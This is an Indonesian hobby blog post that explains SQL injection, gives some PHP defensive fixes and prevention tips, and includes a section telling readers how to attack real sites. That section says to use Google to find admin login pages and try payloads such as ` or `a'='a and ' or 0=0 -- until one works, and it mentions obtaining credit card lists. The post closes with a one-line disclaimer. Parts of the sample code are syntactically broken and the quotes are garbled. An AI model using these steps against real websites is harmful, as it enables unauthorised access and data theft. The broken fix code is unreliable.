• Home
  • About Us
  • Contact Us
  • Disclaimer
  • Sitemap
  • Privacy Policy

Iinformasii

  • Tutorial Blogger
  • Tutorial SEO
  • Template Blogger
  • Catatan
  • Teknologi
    • Smartphone
    • Laptop

MENU

  • Adsense Tips
  • Aplikasi Android
  • Aplikasi BlackBerry
  • Aplikasi Iphone
  • Applications
  • Artikel
  • Backlink
  • BBM Tips
  • BISNIS ONLINE
  • Blogger
  • bukti pembayaran
  • Design Blog
  • Facebook
  • Fakta unik
  • GAMES PC
  • HACKING
  • Handphone
  • Kata-Kata Cinta
  • Kisah Sukses
  • Programming
  • Ramalan cinta
  • SEO
  • Settings Windows
  • Social Media
  • Spesial
  • Tema BlackBerry
  • TIPS
  • TIPS AND TRICK
  • Tips Android
  • Tips Blackberry

Arsip Blog

  • ►  2016 (6)
    • ►  Mei (3)
    • ►  Januari (3)
  • ►  2014 (63)
    • ►  September (18)
    • ►  Agustus (10)
    • ►  Juli (7)
    • ►  Juni (5)
    • ►  April (3)
    • ►  Maret (9)
    • ►  Februari (2)
    • ►  Januari (9)
  • ▼  2013 (121)
    • ►  Desember (9)
    • ►  November (9)
    • ►  Oktober (9)
    • ►  September (6)
    • ►  Agustus (15)
    • ►  Juli (18)
    • ►  Juni (13)
    • ▼  Mei (13)
      • kata kata lucu romantis terbaru terbaik hari ini
      • Cara Mengaktifkan Kembali Akun Facebook Yang Telah...
      • Cara Terbaru Tes Uji Urin di Smartphone Dengan Apl...
      • kata bijak mario teguh terbaru terbaik hari ini
      • Aplikasi Wechat s60v3 s60v5 s^3 anna belle
      • Kumpulan Kata Bijak Motivasi Terbaru & terbaik har...
      • 10 Reasons Why PC Crash
      • Kata-Kata Cinta Fisikawan
      • Kumpulan Font Gratis Untuk Didownload dengan cara...
      • cara menghack dengan SQL Injection dengan cara yan...
      • Resensi Novel Lovasket terbaru
      • 10 Penyebab Komputer Lambat DAN CARA MENGATASI KO...
      • Trik Download Dari 4Shared Tanpa Login dengan car...
    • ►  April (14)
    • ►  Maret (15)

Arsip Blog

  • ►  2016 (6)
    • ►  Mei (3)
    • ►  Januari (3)
  • ►  2014 (63)
    • ►  September (18)
    • ►  Agustus (10)
    • ►  Juli (7)
    • ►  Juni (5)
    • ►  April (3)
    • ►  Maret (9)
    • ►  Februari (2)
    • ►  Januari (9)
  • ▼  2013 (121)
    • ►  Desember (9)
    • ►  November (9)
    • ►  Oktober (9)
    • ►  September (6)
    • ►  Agustus (15)
    • ►  Juli (18)
    • ►  Juni (13)
    • ▼  Mei (13)
      • kata kata lucu romantis terbaru terbaik hari ini
      • Cara Mengaktifkan Kembali Akun Facebook Yang Telah...
      • Cara Terbaru Tes Uji Urin di Smartphone Dengan Apl...
      • kata bijak mario teguh terbaru terbaik hari ini
      • Aplikasi Wechat s60v3 s60v5 s^3 anna belle
      • Kumpulan Kata Bijak Motivasi Terbaru & terbaik har...
      • 10 Reasons Why PC Crash
      • Kata-Kata Cinta Fisikawan
      • Kumpulan Font Gratis Untuk Didownload dengan cara...
      • cara menghack dengan SQL Injection dengan cara yan...
      • Resensi Novel Lovasket terbaru
      • 10 Penyebab Komputer Lambat DAN CARA MENGATASI KO...
      • Trik Download Dari 4Shared Tanpa Login dengan car...
    • ►  April (14)
    • ►  Maret (15)
Diberdayakan oleh Blogger.

Categories

  • Adsense Tips
  • Aplikasi Android
  • Aplikasi BlackBerry
  • Aplikasi Iphone
  • Applications
  • Artikel
  • Backlink
  • BBM Tips
  • BISNIS ONLINE
  • Blogger
  • bukti pembayaran
  • Design Blog
  • Facebook
  • Fakta unik
  • GAMES PC
  • HACKING
  • Handphone
  • Kata-Kata Cinta
  • Kisah Sukses
  • Programming
  • Ramalan cinta
  • SEO
  • Settings Windows
  • Social Media
  • Spesial
  • Tema BlackBerry
  • TIPS
  • TIPS AND TRICK
  • Tips Android
  • Tips Blackberry

Label

  • Adsense Tips
  • Aplikasi Android
  • Aplikasi BlackBerry
  • Aplikasi Iphone
  • Applications
  • Artikel
  • Backlink
  • BBM Tips
  • BISNIS ONLINE
  • Blogger
  • bukti pembayaran
  • Design Blog
  • Facebook
  • Fakta unik
  • GAMES PC
  • HACKING
  • Handphone
  • Kata-Kata Cinta
  • Kisah Sukses
  • Programming
  • Ramalan cinta
  • SEO
  • Settings Windows
  • Social Media
  • Spesial
  • Tema BlackBerry
  • TIPS
  • TIPS AND TRICK
  • Tips Android
  • Tips Blackberry

Text Widget

Sample Text

Pages

  • Beranda

Download

.:[Close][Klik 2x]:.
Home » HACKING » TIPS AND TRICK » cara menghack dengan SQL Injection dengan cara yang tepat mudah , aman , simple , praktis dan terbaru

cara menghack dengan SQL Injection dengan cara yang tepat mudah , aman , simple , praktis dan terbaru

 


Halo sobat blogger, SQL Injection? Sudah tahukah sobat, segala sesuatu tentang SQL Injection ? Kalau belum tahu, baca post ini... Cekidot :)



BACA JUGA :Cara Memblokir Akun Facebook Orang Lain


SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Penyebab terjadinya SQL Injection :
Tidak adanya penanganan terhadap karakter � karakter tanda petik satu ( � ) dan juga karakter double minus ( -- ) yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection yang berbahaya :
  1. Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
  2. Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data�data yang berada didalam database.
  3. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Yang diperlukan untuk melakukan SQL Injection :
  1. Internet Exploler / Browser
  2. PC yang terhubung internet
  3. Program atau software seperti softice
Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
  1. $SQL. = �select * from login where username =�$username� and password = �$password��; , {dari GET atau POST variable }
  2. Isikan password dengan string � or �� = �
  3. Hasilnya maka SQL akan seperti ini = �select * from login where username = �$username� and password=�pass� or �='�; , { dengan SQL ini hasil selection akan selalu TRUE }
  4. Maka sobat bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

| -----------------------------------------------------------------------|
Penanganan SQL Injection
  1. Merubah script php
  2. Menggunakan MySQL_escape_string
  3. Pemfilteran karakter � dengan memodifikasi php.ini
1. Merubah script php
     Contoh script php semula :

         $query = "select id,name,email,password,type,block from user " .
         "where email = '$Email' and password = '$Password'";
         $hasil = mySQL_query($query, $id_mySQL);
         while($row = mySQL_fetch_row($hasil))
         {
             $Id = $row[0];
             $name = $row[1];
             $email = $row[2];
             $password = $row[3];
             $type = $row[4];
             $block = $row[5];
         }
         if(strcmp($block, 'yes') == 0)
         {
             echo "<script></script>
             document.location.href='index.php';\n";
             exit();
         }
         else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

     Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter � or �� = � kedalam form email dan password maka akan terbentuk query sebagai berikut :

    Maka dilakukan perubahan script menjadi :

         $query = "select id,name,email,password,type,block from user".
         "where email = '$Email'";
         $hasil = mySQL_query($query, $id_mySQL);
         .while($row = mySQL_fetch_row($hasil))
        {
             $Id = $row[0];
             $name = $row[1];
             $email = $row[2];
             $password = $row[3];
             $type = $row[4];
             $block = $row[5];
         }
         if(strcmp($block, 'yes') == 0)
         {
             echo "<script></script>
             document.location.href='index.php';\n";
             exit();
         }
         $pass = md5($Password);
         else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
     Merubah string yang mengandung karakter ( � ) menjadi ( \� ) misal SQL injection menjadi SQL
     injection
     Contoh :
        $kar = �SQL injection�;
        $filter = mySQL_escape_string($kar);
        echo�Hasil filter : $filter�;

3. Pemfilteran karakter � dengan memodifikasi php.ini
     Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga
     menyebabkan string maupun karakter ( � ) diubah menjadi ( \� ) secara otomatis oleh php
     Contoh script yang membatasi karakter yang bisa masukkan :

     function validatepassword( input )
            good_password_chars =
            "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
            validatepassword = true
            for i = 1 to len( input )
                c = mid( input, i, 1 )
                if ( InStr( good_password_chars, c ) = 0 ) then
                    validatepassword = false
                    exit function
                end if
            next
        end function
| -----------------------------------------------------------------------|

Implementasi SQL Injection
  1. Masuk ke google atau browse yg lain
  2. Masukkan salah satu keyword berikut

  3. "/admin.asp"
    "/login.asp"
    "/logon.asp"
    "/adminlogin.asp"
    "/adminlogon.asp"
    "/admin_login.asp"
    "/admin_logon.asp"
    "/admin/admin.asp"
    "/admin/login.asp"
    "/admin/logon.asp"
    {anda bisa menambahi sendiri sesuai keinginan anda}
  4. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
  5. Masukkan kode berikut :
    User name : ` or `a'='a
    Password : ` or `a'='a (termasuk tanda petiknya)
  6. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
  7. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
  8. Banyak variasi kode yang mungkin, antara lain :
    User name : admin
    Password : ` or `a'='a
    atau bisa dimasukkan ke dua�duanya misal :
    � or 0=0 -- ; � or 0=0 -- ; or 0=0 -- ; � or 0=0 # ;
    � or 0=0 # ; � or�x�=�x ; � or �x�=�x ; �) or (�x�=�x
    Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION

  1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
  2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
  3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
  4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
  5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
-- CMIIW --
SEKEDAR INFORMASI SAJA, JANGAN DITUJUKAN UNTUK HAL YANG BURUK YAH...

Semoga bermanfaat.




Tweet

Terimakasih anda telah membaca artikel tentang cara menghack dengan SQL Injection dengan cara yang tepat mudah , aman , simple , praktis dan terbaru. Jika ingin menduplikasi artikel ini diharapkan anda untuk mencantumkan link https://iinformasii.blogspot.com/2013/05/cara-menghack-dengan-sql-injection.html. Terimakasih atas perhatiannya.

Related Posts

di 17.23
Label: HACKING, TIPS AND TRICK

{ 0 komentar... read them below or add one }


Posting Komentar

Posting Lebih Baru Posting Lama Beranda

Popular Posts

  • Cara Download Video Video Youtube Langsung Dari Youtube
    Cara Download Video Video Youtube Langsung Dari Youtube
    08/09/2014, Bagaimana, anda suka nonton video-video yang ada di youtube, tentunya dong? Hehe. Youtube terkenal dengan video-video nya yang ...
  • Cara Hack Facebook Orang Lain Menggunakan Hp Symbian S60v3 S60v5
    Cara hack facebook orang lain menggunakan hp symbian s60v3 dan s60v5 mungkin sedang di cari-cari oleh sahabat semuanya, sebenarnya hack f...
  • Download Zoo Tycoon 2 Endangered Species Full Version Full Crack
    Download Zoo Tycoon 2 Endangered Species Full Version Full Crack
    Download Zoo Tycoon 2 Endangered Species Full Version  - Hai sahabat semuanya, kali ini saya akan share game strategi yang berjudul Zoo Tyco...
  • Cara Mengatasi Masalah WeChat Server Busy  dengan cara yang tepat mudah , aman , simple , praktis  dan terbaru
    Cara Mengatasi Masalah WeChat Server Busy dengan cara yang tepat mudah , aman , simple , praktis dan terbaru
    Bagi para sobat yang suka chatingan di HP, pastinya anda sudah kenal Aplikasi Chat terbaru Wechat adalah aplikasi chatting yang sedang po...
  • BEGINILAH WAJAH REMAJA PADA ZAMAN BATU?
     Pernah membayangkan seperti apa wajah orang dari 5.500 Sebelum Masehi (SM)? Kini,para ahli berhasil merekonstruksi seperti apa wajah orang ...
  • PROGRAM MERAMAL ARTI NAMA, JODOH, KARIR DAN SEMUANYA TERBARU 2014
    PROGRAM MERAMAL ARTI NAMA, JODOH, KARIR DAN SEMUANYA TERBARU 2014
    program meramal di bawah ini, bisa meramal tentang gambaran kepribadian, nasib, dan jodoh sobat. Masalah jodoh memang sudah menjadi takdi...
  • Tips cara menghilangkan bekas jerawat pada wajah secara alami terbaru hari ini dan terbukti berhasil
    Tips cara menghilangkan bekas jerawat pada wajah secara alami terbaru hari ini dan terbukti berhasil
    Bekas jerawat pada wajah kadang membuat warna kulit tidak merata akibat timbulnya flek hitam dan noda yang tentunya akan membuat tekstur da...
  • Download Game Harvest Moon Back To Nature buat PC
    Download Game Harvest Moon Back To Nature buat PC
    Hai Sobat Blogger.....kali ini saya akan share tentang Game Harvest Moon Back To Nature , Game ini sebenarnya bukan untuk pc tapi kita bisa...
  • akhlak pendoman berperilaku
    Akhlak. Kajian Akhlak Tauhid. Akhlak berarti prilaku, sikap, perbuatan, adab dan sopan santun. Akhlak mulia berati seluruh prilaku umat m...
  • Kemampuan-kemampuan Menakjubkan dari Otak Bayi
    Kemampuan-kemampuan Menakjubkan dari Otak Bayi
    Jakarta,  Apa yang dapat dilakukan oleh bayi mungkin dianggap hal yang sepele bagi orang dewasa karena bayi belum dapat mengimbangi percakap...
Copyright Iinformasii: cara menghack dengan SQL Injection dengan cara yang tepat mudah , aman , simple , praktis dan terbaru